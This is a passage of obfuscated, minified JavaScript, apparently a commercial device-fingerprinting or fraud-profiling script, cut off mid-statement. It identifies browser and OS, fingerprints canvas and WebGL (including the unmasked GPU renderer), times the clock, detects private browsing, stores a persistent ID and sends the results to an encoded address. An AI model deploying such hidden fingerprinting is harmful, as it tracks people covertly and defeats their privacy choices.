td_u=/(Mac OS X 10[\.\_\d]+)/.exec(td_Q); if(td_u!==null&&td_u.length>=1){td_O=td_u[1];}break;case td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(208,7):td_O=null;var td_P=/[^-](Android[^\d]?[\.\_\d]+)/.exec(td_Q);if(td_P!==null&&td_P.length>=1){td_O=td_P[1]; }break;case td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(271,4):case td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(254,6):case td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(260,11):td_O=null;td_E=/OS (\d+)_(\d+)_?(\d+)?/.exec(td_Y); if(td_E!==null){var td_a=td_E.length>=1?td_E[1]:td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(554,7);var td_w=td_E.length>=2?td_E[2]:td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(554,7);var td_s=td_E.length>=3?td_E[3]|"0":"0"; td_O=td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(561,4)+td_a+"."+td_w+"."+td_s;}break;default:return null;}return td_O;},td_J:function(td_h){for(var td_l=0;td_l<td_h.length;td_l++){var td_X=td_h[td_l].string; var td_s=td_h[td_l].prop;this.versionSearchString=td_h[td_l].versionSearch||td_h[td_l].identity;if(td_X){if(td_X.indexOf(td_h[td_l].subString)!==-1){return td_h[td_l].identity;}}else{if(td_s){return td_h[td_l].identity; }}}},td_n:function(td_a,td_g){if(!td_a){return null;}var td_h;switch(td_a){case td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(106,6):var td_y=/\WVersion[^\d]([\.\d]+)/.exec(td_g);if(td_y!==null&&td_y.length>=1){td_h=td_y[1]; }break;case td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(3,5):if(this.versionSearchString===td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(0,3)){var td_u=/\WOPR[^\d]*([\.\d]+)/.exec(td_g);if(td_u!==null&&td_u.length>=1){td_h=td_u[1]; }break;}default:var td_v=td_g.indexOf(this.versionSearchString);if(td_v!==-1){td_h=td_g.substring(td_v+this.versionSearchString.length+1);}break;}if(td_h){return parseFloat(td_h);}return null;},td_N:function(){try{var check=((typeof window.opr!==[][[]]+"")&&(typeof td_b.addons!==[][[]]+""))||(typeof window.opera!==[][[]]+""); if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(3,5);}check=(typeof InstallTrigger!==[][[]]+"");if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(71,7);}check=/constructor/i.test(window.HTMLElement)||(function(p){return p.toString()===td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(565,33); })(!window[td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(598,6)]||(typeof safari!==[][[]]+""&&safari.pushNotification));check=(typeof window.safari!==[][[]]+"");if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(106,6); }check= /*@cc_on!@*/ false||(typeof document.documentMode!==[][[]]+"");if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(22,8);}if(!check&&(typeof window.StyleMedia!==[][[]]+"")){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(18,4); }check=(typeof window.chrome!==[][[]]+"")&&(typeof window.yandex==[][[]]+"")&&((typeof window.chrome.webstore!==[][[]]+"")||(typeof window.chrome.runtime!==[][[]]+"")||(typeof window.chrome.loadTimes!==[][[]]+"")); if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(45,6);}if(this.mobile){check=(typeof window.chrome!==[][[]]+"")&&(typeof window.chrome.Benchmarking!==[][[]]+"");if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(604,14); }check=(typeof window.ucapi!==[][[]]+"");if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(618,9);}}check=(typeof window.chrome!==[][[]]+"")&&(typeof window.yandex!==[][[]]+"");if(check){return td_2V.tdz_a0c56cb508554c44879ae82ba354513d.td_f(39,6); }}catch(err){}return null;},td_d:{},td_M:{},td_j:{},td_T:{}};td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32=new td_2V.td_1r("\x38\x65\x32\x34\x65\x38\x39\x65\x64\x35\x34\x65\x34\x62\x64\x32\x61\x30\x31\x64\x35\x65\x36\x64\x34\x66\x35\x37\x63\x63\x33\x32\x34\x38\x31\x37\x34\x36\x34\x31\x31\x30\x34\x66\x34\x66\x31\x66\x31\x63\x34\x65\x34\x66\x31\x39\x34\x38\x31\x64\x31\x61\x35\x33\x30\x31\x35\x62\x35\x33\x30\x31\x35\x30\x31\x35\x34\x34\x31\x30\x34\x31\x31\x33\x34\x32\x34\x31\x31\x39\x31\x62\x34\x38\x34\x38\x34\x33\x31\x39\x34\x64\x34\x39\x31\x34\x34\x33\x34\x33\x31\x30\x31\x31\x34\x37\x34\x33\x31\x34\x34\x61\x31\x39\x31\x65\x34\x65\x31\x64\x34\x65\x34\x64\x30\x35\x35\x34\x30\x36\x34\x36\x31\x37\x34\x35\x31\x32\x34\x39\x34\x36\x31\x35\x31\x61\x34\x66\x34\x39\x34\x32\x31\x66\x34\x65\x34\x61\x31\x62\x34\x39\x34\x32\x31\x66\x31\x31\x34\x31\x34\x35\x31\x33\x34\x64\x31\x64\x31\x34\x34\x30\x31\x62\x34\x35\x34\x35\x31\x33\x34\x33\x31\x63\x34\x38\x31\x66\x34\x65\x31\x66\x34\x39\x34\x39\x31\x64\x30\x32\x35\x32\x35\x39\x35\x61\x30\x30\x35\x36\x35\x33\x30\x33\x35\x38\x35\x31\x30\x66\x30\x65\x34\x35\x34\x36\x31\x66\x34\x31\x31\x36\x31\x33\x34\x34\x31\x38\x34\x65\x34\x61\x31\x65\x34\x63\x31\x39\x34\x38\x31\x61\x35\x35\x30\x36\x35\x36\x35\x35\x30\x36\x30\x65\x35\x34\x35\x35\x35\x31\x30\x64\x35\x39\x35\x62\x31\x35\x34\x61\x34\x33\x31\x30\x31\x30\x34\x32\x34\x32\x31\x63\x34\x61\x31\x39\x31\x65\x34\x62\x31\x64\x34\x65\x34\x66\x30\x35\x35\x35\x30\x36\x35\x34\x30\x31\x35\x36\x30\x31\x35\x33\x35\x39\x31\x33\x31\x31\x34\x39\x34\x37\x34\x63\x31\x32\x34\x34\x34\x64\x31\x62\x34\x33\x34\x33\x31\x63\x31\x38\x34\x62\x34\x61\x30\x34\x35\x35\x30\x30\x30\x36\x35\x37\x30\x35\x35\x37\x35\x37\x30\x35\x35\x64\x30\x65\x35\x64\x31\x34\x34\x36\x31\x63\x34\x30\x34\x33\x31\x34\x31\x35\x34\x61\x34\x63\x34\x33\x31\x66\x34\x62\x34\x38\x31\x62\x34\x36\x35\x38\x30\x35\x30\x31\x35\x37\x35\x31\x30\x32\x35\x62\x30\x63\x34\x32\x35\x38\x30\x30\x35\x33\x30\x63\x35\x35\x31\x33\x30\x66\x35\x33\x35\x39"); var td_2V=td_2V||{};var td_0a=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(0,21);var td_0g=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(21,15);var td_2J=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(36,18); var td_0T=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(54,15);var td_0N=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(69,9);var td_0z=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(78,27);var td_0o=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(105,27); var td_0Z=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(132,24);var td_3q=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(156,27);var td_2U=td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(183,21);function td_3J(td_F,td_f,td_y){var td_p=td_2V.td_0m(td_f); if(td_p===null){return;}return td_g(td_F,td_p,td_y);}function td_g(td_G,td_S,td_V){if(td_G.attachEvent){td_G.attachEvent(td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(204,2)+td_S,function(td_H){td_V(td_H||window.event); });}else{td_G.addEventListener(td_S,td_V,false);}}function td_1w(td_R,td_H,td_S){var td_Y=td_2V.td_0m(td_H);if(td_Y===null){return;}return td_e(td_R,td_Y,td_S);}function td_e(td_f,td_t,td_R){if(td_f.attachEvent){td_f["e"+td_t+td_R]=td_R; td_f[td_t+td_R]=function(){td_f["e"+td_t+td_R](window.event);};td_f.detachEvent(td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(204,2)+td_t,td_f[td_t+td_R]);}else{td_f.removeEventListener(td_t,td_R,false); }}function td_r(){var td_L=500;var td_F=30000;var td_R=[];var td_G=0;this.addFeature=function(td_o,td_D){if(typeof td_D===[][[]]+""||td_D<td_L){td_D=td_L;}var td_t=Math.ceil(td_D/td_L);td_R.push([td_o,td_t,true]); td_o.setup();};this.getFeaturesForTest=function(){return td_R;};this.start=function(){if(td_R.length===0){return;}setTimeout(td_2A.check,td_L);};this.check=function(){var td_V;var td_B="";var td_W=0;td_G++; for(td_V=0;td_V<td_R.length;td_V++){var td_D=td_R[td_V][0];var td_y=td_R[td_V][1];var td_S=td_R[td_V][2];if(!td_S){td_W++;continue;}if(td_G>=td_y){var td_i=td_D.getFPParams();if(td_i!==null){td_B+=td_i; }if(!td_D.tryAgain()){td_R[td_V][2]=false;td_W++;}else{}}}if(td_B.length>0){var td_C=td_3Y+td_2V.tdz_8e24e89ed54e4bd2a01d5e6d4f57cc32.td_f(206,10)+td_2V.td_2u(td_B,td_2m);td_0K(td_C,document);}if(td_G>=Math.ceil(td_F/td_L)){return; }if(td_W<td_R.length){setTimeout(td_2A.check,td_L);}else{}};}var td_2A=new td_r();td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82=new td_2V.td_1r("\x65\x36\x37\x32\x31\x36\x65\x30\x32\x63\x37\x66\x34\x30\x32\x63\x61\x31\x35\x32\x62\x63\x31\x35\x62\x30\x62\x33\x36\x64\x38\x32\x30\x33\x34\x33\x35\x39\x35\x31\x34\x35\x35\x66\x30\x61\x35\x65\x35\x37\x30\x37\x30\x30\x35\x35\x35\x32\x30\x32\x30\x32\x30\x36\x30\x35\x35\x33\x35\x33\x30\x30\x30\x30\x35\x34\x30\x32\x31\x33\x30\x65\x35\x31\x33\x64\x35\x63\x35\x61\x30\x30\x30\x35\x31\x34\x30\x39\x35\x37\x30\x61\x34\x30\x35\x64\x34\x35"); var td_2V=td_2V||{};if(typeof td_2V.td_3d===[][[]]+""){td_2V.td_3d=[];}var td_uJ;function td_rw(){if(typeof td_uJ===td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(0,8)){td_uJ();}}function td_0H(){try{if(window.localStorage){var td_HW=null; var td_tZ=null;var td_HI=window.localStorage.getItem(td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(8,15));if(td_HI!==null){var td_pG=td_HI.split("_");if(td_pG.length===2){var td_MO=td_pG[1];if(td_MO<td_E()){window.localStorage.setItem(td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(8,15),td_0x); td_HW=td_0x.split("_")[0];td_tZ=td_pG[0];}else{td_HW=td_pG[0];}}else{if(td_pG.length===1){window.localStorage.setItem(td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(8,15),td_pG[0]+"_"+td_0x.split("_")[1]); td_HW=td_pG[0];}else{window.localStorage.setItem(td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(8,15),td_0x);td_HW=td_0x.split("_")[0];}}}else{window.localStorage.setItem(td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(8,15),td_0x); td_HW=td_0x.split("_")[0];}var td_M9="";if(td_tZ!==null){td_M9=td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(23,8)+td_tZ;}var td_RV=td_3Y+td_M9+td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(31,4)+td_3x+td_HW; td_0K(td_RV,document);return td_RV;}}catch(td_NJ){td_rw();}}function td_1g(){td_2V.td_2c();td_2V.td_2g(document);td_x();td_uJ=function(){try{window.parent.postMessage(td_2V.tdz_e67216e02c7f402ca152bc15b0b36d82.td_f(35,3),"*"); }catch(td_Dp){}};td_0H();}td_2V.td_3d.push(function(){var td_0V = new td_2V.td_1r("d7efed427e964cde8ed4e8c9eb3eecad0C431116165E1B1D5E085E451A100D02560C024D01160056084D55154A000D0105454B160B030B5D4502665F505E13574C1D0B010459454A0011400C0A0D3E0D000A550753010D5756520A010C06545359005551555B5B0D5D510A0657025100510F43080A0A57570A005B010D075D075A55545506595A580756070656545953065201510150010454040A0750065D55590756075D0C520C5600520101570700545403070007030B063A0801055051510A5C530D53085A");td_3x = td_0V.td_f(121,16);td_0x = td_0V.td_f(137,46);td_3Y = td_0V.td_f(0,121);});td_2V.tdz_65a932332a0f4e54aaaf42744d20956c=new td_2V.td_1r("\x36\x35\x61\x39\x33\x32\x33\x33\x32\x61\x30\x66\x34\x65\x35\x34\x61\x61\x61\x66\x34\x32\x37\x34\x34\x64\x32\x30\x39\x35\x36\x63\x35\x35\x35\x34\x30\x66\x34\x66\x35\x32\x34\x31\x30\x31\x35\x37\x37\x32\x32\x33\x34\x32\x30\x39\x34\x33\x31\x36\x35\x30\x34\x36\x31\x32\x31\x66\x34\x34\x30\x30\x35\x64\x35\x63\x35\x30\x37\x33\x36\x34\x33\x36\x35\x62\x35\x65\x34\x64\x31\x31\x31\x30\x34\x66\x30\x61\x35\x36\x30\x30\x35\x37\x34\x35\x35\x33\x34\x30\x30\x64\x30\x61\x31\x31\x34\x38\x34\x36\x37\x35\x31\x37\x35\x63\x35\x35\x30\x64\x35\x30\x35\x33\x31\x36\x34\x63\x31\x32\x37\x36\x34\x36\x35\x64\x30\x35\x35\x65\x35\x64\x35\x38\x35\x32\x35\x33\x30\x64\x34\x32\x35\x34\x35\x31\x31\x37\x30\x36\x30\x33\x31\x64\x30\x33\x34\x30\x30\x34\x35\x34\x30\x66\x35\x39\x30\x34\x35\x32\x35\x31\x34\x65\x31\x31\x30\x66\x30\x31"); var td_2V=td_2V||{};function td_1t(){try{var td_OG=document.createElement(td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(0,6));if(!td_OG){return null;}if(!(td_OG.getContext)){return null;}var td_Ma=td_OG.getContext(td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(6,2)); if(!td_Ma){return null;}if(!td_Ma.font||!td_Ma.fillText){return null;}td_OG.width=300;td_OG.height=100;td_Ma=td_OG.getContext(td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(6,2));var td_wy=td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(8,32); td_Ma.font=td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(40,9);td_Ma.fillText(td_wy,0,50);td_Ma.font=td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(49,10);var td_kS=td_Ma.createLinearGradient(0,0,td_OG.width,0); td_kS.addColorStop("0",td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(59,7));td_kS.addColorStop(td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(66,3),Number(348826).toString(31));td_kS.addColorStop(td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(69,3),td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(72,3)); td_Ma.fillStyle=td_kS;td_Ma.fillText(td_wy,0,90);var td_gU=td_OG.toDataURL(td_2V.tdz_65a932332a0f4e54aaaf42744d20956c.td_f(75,9));if(!td_gU){return null;}return td_3H(td_gU);}catch(td_p0){return null;}}td_2V.tdz_6f3311ee98ce4a1a95855110ed6c38b0=new td_2V.td_1r("\x36\x66\x33\x33\x31\x31\x65\x65\x39\x38\x63\x65\x34\x61\x31\x61\x39\x35\x38\x35\x35\x31\x31\x30\x65\x64\x36\x63\x33\x38\x62\x30\x35\x35\x30\x37\x35\x64\x34\x35\x35\x30\x34\x32\x31\x32\x30\x30\x35\x62\x35\x66\x30\x66\x30\x30\x34\x63\x31\x31\x35\x34\x31\x33\x35\x30\x35\x38\x35\x64\x35\x62\x34\x31\x35\x30\x35\x64\x31\x64\x31\x32\x30\x31\x35\x34\x30\x34\x35\x66\x35\x35\x30\x64\x34\x61\x31\x62\x31\x31\x35\x36\x35\x31\x35\x36\x35\x64\x31\x32\x30\x30\x35\x62\x35\x33\x30\x61\x31\x31\x31\x39\x35\x32\x35\x35\x30\x37\x34\x63\x35\x62\x35\x62\x34\x31\x35\x63\x35\x65\x35\x66"); var td_2V=td_2V||{};function td_w5(){if(!!window.WebGLRenderingContext){var td_rg=document.createElement(td_2V.tdz_6f3311ee98ce4a1a95855110ed6c38b0.td_f(0,6));var td_Ph=[td_2V.tdz_6f3311ee98ce4a1a95855110ed6c38b0.td_f(6,5),td_2V.tdz_6f3311ee98ce4a1a95855110ed6c38b0.td_f(11,18),td_2V.tdz_6f3311ee98ce4a1a95855110ed6c38b0.td_f(29,9),td_2V.tdz_6f3311ee98ce4a1a95855110ed6c38b0.td_f(38,9)]; for(var td_ml=0;td_ml<4;td_ml++){try{var td_LR=td_rg.getContext(td_Ph[td_ml]);if(td_LR&&typeof td_LR.getParameter===td_2V.tdz_6f3311ee98ce4a1a95855110ed6c38b0.td_f(47,8)){return{name:td_Ph[td_ml],gl:td_LR}; }}catch(td_QV){}}return -1;}return 0;}function td_1H(){td_1T(td_2j,document);}td_2V.tdz_026c1ec7663245f687ddee5a93f3750c=new td_2V.td_1r("\x30\x32\x36\x63\x31\x65\x63\x37\x36\x36\x33\x32\x34\x35\x66\x36\x38\x37\x64\x64\x65\x65\x35\x61\x39\x33\x66\x33\x37\x35\x30\x63\x31\x36\x34\x32\x35\x62\x35\x65\x34\x38\x30\x30\x31\x30\x35\x39\x35\x39\x37\x35\x35\x62\x34\x30\x35\x62\x35\x38\x30\x33\x37\x39\x34\x38\x35\x32\x31\x36\x30\x35\x32\x33\x30\x63\x34\x37\x30\x34\x35\x66\x35\x63\x31\x65\x37\x36\x34\x66\x34\x35\x35\x63\x30\x63\x34\x32\x35\x37\x34\x34\x33\x30\x35\x30\x30\x33\x30\x32\x34\x35\x35\x66\x30\x33\x35\x36\x35\x34\x30\x31\x30\x33\x30\x32\x35\x33\x35\x64\x30\x32\x35\x33\x35\x33\x30\x34\x30\x33"); var td_2V=td_2V||{};function td_1M(){var td_cb;var td_wB;var td_LT=td_0Q.td_3L;var td_F9=parseInt(td_0Q.td_3p);this.tryAgain=function(){return false;};this.getFPParams=function(){var td_OA=td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(0,4); if(typeof td_cb===[][[]]+""){if(typeof td_wB!==[][[]]+""&&td_wB.readyState===Number(218714).toString(25)){td_cb=td_wB.result?false:true;}else{return null;}}td_OA+=td_cb?td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(4,3):td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(7,2); return td_OA;};this.setup=function(){if((td_LT===td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(9,6)||td_LT===td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(15,5))&&window.webkitRequestFileSystem){window.webkitRequestFileSystem(window.TEMPORARY,1,function(){td_cb=false; },function(td_Ev){td_cb=true;});}else{if(td_LT===td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(20,7)&&window.indexedDB){if(typeof td_wB===[][[]]+""){try{td_wB=window.indexedDB.open(Number(796469).toString(30)); }catch(td_un){td_cb=true;}}}else{if(td_LT===td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(27,8)&&td_F9>=10){td_cb=false;try{if(!window.indexedDB){td_cb=true;}}catch(td_un){td_cb=true;}}else{if(td_LT===td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(35,6)&&window.localStorage){try{window.localStorage.setItem(td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(41,13),1); }catch(td_un){td_cb=true;}if(typeof td_cb===[][[]]+""){td_cb=false;window.localStorage.removeItem(td_2V.tdz_026c1ec7663245f687ddee5a93f3750c.td_f(41,13));}if(td_cb===false){try{window.openDatabase(null,null,null,null); }catch(td_un){td_cb=true;}}}}}}};}td_2V.tdz_1ff3a61fb57042b696e1b7ae972da368=new td_2V.td_1r("\x31\x66\x66\x33\x61\x36\x31\x66\x62\x35\x37\x30\x34\x32\x62\x36\x39\x36\x65\x31\x62\x37\x61\x65\x39\x37\x32\x64\x61\x33\x36\x38\x37\x37\x30\x66\x31\x34\x35\x36\x30\x37\x35\x39\x34\x39\x33\x35\x30\x33\x35\x33\x35\x36\x34\x32\x35\x64"); var td_2V=td_2V||{};function td_1I(){var td_U4=20;var td_hS=10;var td_Yd=10;var td_kf=0;var td_dz=null;var td_l0=function(){return window.performance.now()*1000;};var td_NJ=function(){return performance.now().toFixed(3)/1000; };var td_wq=function(){return(td_E()-td_kf).toFixed(3)*1000;};function td_OK(){var td_u2=1;var td_X6=td_dz();var td_JK=td_dz();while(td_JK===td_X6){td_JK=td_dz();++td_u2;}var td_YV=(td_JK-td_X6)*1000000; var td_en=td_u2/td_YV;if(td_en<1e-8){return 1e-8;}return td_en;}function td_OF(){var td_IV=0;var td_dJ=0;try{var td_o7=td_OK();td_IV=td_dz();td_dJ=td_dz()-td_IV;if(td_dJ===0||td_dJ<1e-8){td_dJ=td_o7;}for(var td_Yc=0; td_Yc<td_U4;++td_Yc){td_dJ=td_AG(td_dJ,(td_dz()-td_IV));}return(Math.round(1/td_dJ));}catch(td_fE){return -1;}}function td_AG(td_YR,td_ng){try{if(td_YR<1e-8){return td_ng;}if(td_YR<td_ng){return td_AG(td_ng-Math.floor(td_ng/td_YR)*td_YR,td_YR); }else{if(td_YR===td_ng){return td_YR;}else{return td_AG(td_ng,td_YR);}}}catch(td_LB){return 0;}}function td_vn(td_xQ){if(td_xQ.length<1){return 0;}var td_nA=0;for(var td_uh=0;td_uh<td_xQ.length;++td_uh){td_nA+=td_xQ[td_uh]; }return Math.floor(td_nA/td_xQ.length);}function td_Gp(td_iQ,td_Is){if(td_iQ.length<2){return 0;}var td_uB=0;for(var td_dB=0;td_dB<td_iQ.length;++td_dB){td_uB+=Math.pow(td_iQ[td_dB]-td_Is,2);}return Math.floor(Math.sqrt(td_uB/td_iQ.length)); }function td_wd(td_yn,td_tT,td_tN,td_CQ){if(td_yn.length<1){return 0;}var td_ai=[];var td_wp=td_tN+(td_tT*td_CQ);var td_qV=td_tN-(td_tT*td_CQ);for(var td_lI=0;td_lI<td_yn.length;td_lI++){if(td_yn[td_lI]>td_qV&&td_wp>td_yn[td_lI]){td_ai.push(td_yn[td_lI]); }}return td_ai;}if(td_0Q.td_3L!==td_2V.tdz_1ff3a61fb57042b696e1b7ae972da368.td_f(0,7)&&td_0Q.td_3L!==td_2V.tdz_1ff3a61fb57042b696e1b7ae972da368.td_f(7,6)&&typeof performance!==[][[]]+""&&typeof performance.now!==[][[]]+""){td_dz=td_NJ; }else{if(td_0Q.td_3L!==td_2V.tdz_1ff3a61fb57042b696e1b7ae972da368.td_f(7,6)&&typeof window.performance!==[][[]]+""&&typeof window.performance.now!==[][[]]+""){td_dz=td_l0;}else{td_kf=td_E();td_dz=td_wq; }}if(!td_dz||!Math||!Math.round||!Math.floor||!Math.sqrt||!Math.pow){return null;}function td_kC(){var td_pa=[];for(var td_ai=0;td_ai<td_hS;++td_ai){td_pa.push(td_OF());}var td_tN=td_vn(td_pa);var td_id=td_Gp(td_pa,td_tN); var td_FD=0;var td_kT=0;if(td_id!==0){var td_wX=td_wd(td_pa,td_id,td_tN,1);td_kT=td_vn(td_wX);td_FD=Math.round(td_kT);}else{td_FD=Math.round(td_tN);}return td_FD;}var td_PH=0;var td_c3=0;while(td_PH===0&&td_c3++<td_Yd){td_PH=td_kC(); }return encodeURIComponent(td_PH);}td_2V.tdz_58eb1ae220f249b688855332066a379f=new td_2V.td_1r("\x35\x38\x65\x62\x31\x61\x65\x32\x32\x30\x66\x32\x34\x39\x62\x36\x38\x38\x38\x35\x35\x33\x33\x32\x30\x36\x36\x61\x33\x37\x39\x66\x30\x65\x31\x38\x32\x30\x33\x61\x36\x35\x33\x65\x31\x31\x35\x37\x34\x61\x34\x34\x31\x33\x34\x30\x35\x31\x36\x36\x30\x34\x35\x66\x35\x34\x34\x63\x35\x64\x34\x37\x36\x61\x35\x32\x35\x64\x35\x62\x34\x33\x35\x39\x34\x32\x31\x33\x35\x63\x34\x37\x35\x30\x30\x35\x36\x32\x37\x64\x32\x37\x32\x39\x37\x38\x33\x35\x33\x61\x37\x37\x36\x61\x36\x34\x33\x39\x34\x36\x35\x31\x34\x31\x31\x36\x34\x33\x34\x61\x35\x64\x36\x37\x35\x33\x35\x63\x35\x66\x34\x37\x35\x37\x34\x32\x36\x39\x35\x37\x30\x66\x35\x61\x34\x34\x35\x36\x31\x32\x34\x37\x35\x37\x31\x35\x30\x62\x35\x32\x32\x63\x32\x61\x36\x38\x36\x64\x37\x35\x33\x65\x36\x36\x36\x62\x34\x64\x30\x37\x34\x65\x34\x63\x34\x64\x34\x61\x35\x30\x36\x61\x35\x35\x35\x61\x35\x65\x34\x34\x35\x33\x34\x34\x33\x65\x35\x32\x35\x39\x35\x30\x31\x35\x35\x61\x34\x63\x31\x37\x30\x64\x34\x31\x30\x38\x30\x36\x37\x63\x35\x64\x34\x34\x34\x36\x35\x33\x34\x32\x35\x38\x30\x62\x35\x61\x35\x39\x35\x61\x35\x34\x35\x30\x35\x33\x34\x36\x35\x64\x35\x31\x34\x34\x35\x66\x35\x39\x30\x66\x36\x34\x37\x32\x37\x62\x32\x31\x37\x39\x36\x37\x30\x31\x30\x37\x35\x33\x31\x34\x30\x32\x36\x64\x34\x30\x35\x35\x30\x38\x35\x36\x35\x31\x34\x62\x30\x37\x34\x34\x36\x37\x35\x31\x35\x36\x35\x33\x35\x61\x35\x63\x35\x31\x35\x38\x35\x35\x35\x35\x34\x32\x31\x32\x34\x37\x34\x35\x35\x30\x30\x38\x35\x32\x31\x65\x31\x32\x30\x35\x35\x64\x31\x37\x35\x38\x31\x34\x34\x35\x35\x37\x30\x61\x34\x30\x30\x39"); var td_2V=td_2V||{};function td_2F(){try{var td_ly=td_w5();if(td_ly===0||td_ly===-1){return;}var td_o0=td_ly.gl;var td_pM=td_ly.name;td_pM+=td_o0.getParameter(td_o0.VERSION);td_pM+=td_o0.getParameter(td_o0.SHADING_LANGUAGE_VERSION); td_pM+=td_o0.getParameter(td_o0.VENDOR);td_pM+=td_o0.getParameter(td_o0.RENDERER);var td_qQ=[];try{td_qQ=td_o0.getSupportedExtensions();}catch(td_iP){}var td_aP=td_qQ.length;if(td_aP){var td_w2="";for(var td_mB=0; td_mB<td_aP;td_mB++){if(td_w2.length){td_w2+=td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(0,2);}td_w2+=td_qQ[td_mB];}td_pM+=td_w2;}var td_DQ;var td_iP=td_o0.getExtension(td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(2,30))||td_o0.getExtension(td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(32,37))||td_o0.getExtension(td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(69,34)); if(td_iP){td_DQ=td_o0.getParameter(td_iP.MAX_TEXTURE_MAX_ANISOTROPY_EXT);if(td_DQ===0){td_DQ=2;}}else{td_DQ=td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(103,13);}td_pM+=td_DQ;return td_pM;}catch(td_iP){return null; }}function td_1a(){try{var td_Gy=td_w5();if(td_Gy===0||td_Gy===-1){return;}var td_c9=td_Gy.gl;if(typeof td_c9.getExtension!==td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(116,8)||typeof td_c9.getParameter!==td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(116,8)){return null; }var td_nH=td_c9.getExtension(td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(124,25));if(!td_nH||typeof td_nH!==td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(149,6)){return null;}var td_ml="";var td_lD=td_c9.getParameter(td_nH.UNMASKED_VENDOR_WEBGL); if(typeof td_lD===td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(155,6)){td_ml+=td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(161,6)+encodeURIComponent(td_lD);}var td_FI=td_c9.getParameter(td_nH.UNMASKED_RENDERER_WEBGL); if(typeof td_FI===td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(155,6)){td_ml+=td_2V.tdz_58eb1ae220f249b688855332066a379f.td_f(167,6)+encodeURIComponent(td_FI);}return td_ml;}catch(td_jU){return null; }}var td_2V=td_2V||{};function td_0y(){td_2V.load_iframe(td_2H,td_2R,document);}td_2V.tdz_d5492fe35e8447598ec1c67bdbcce123=new 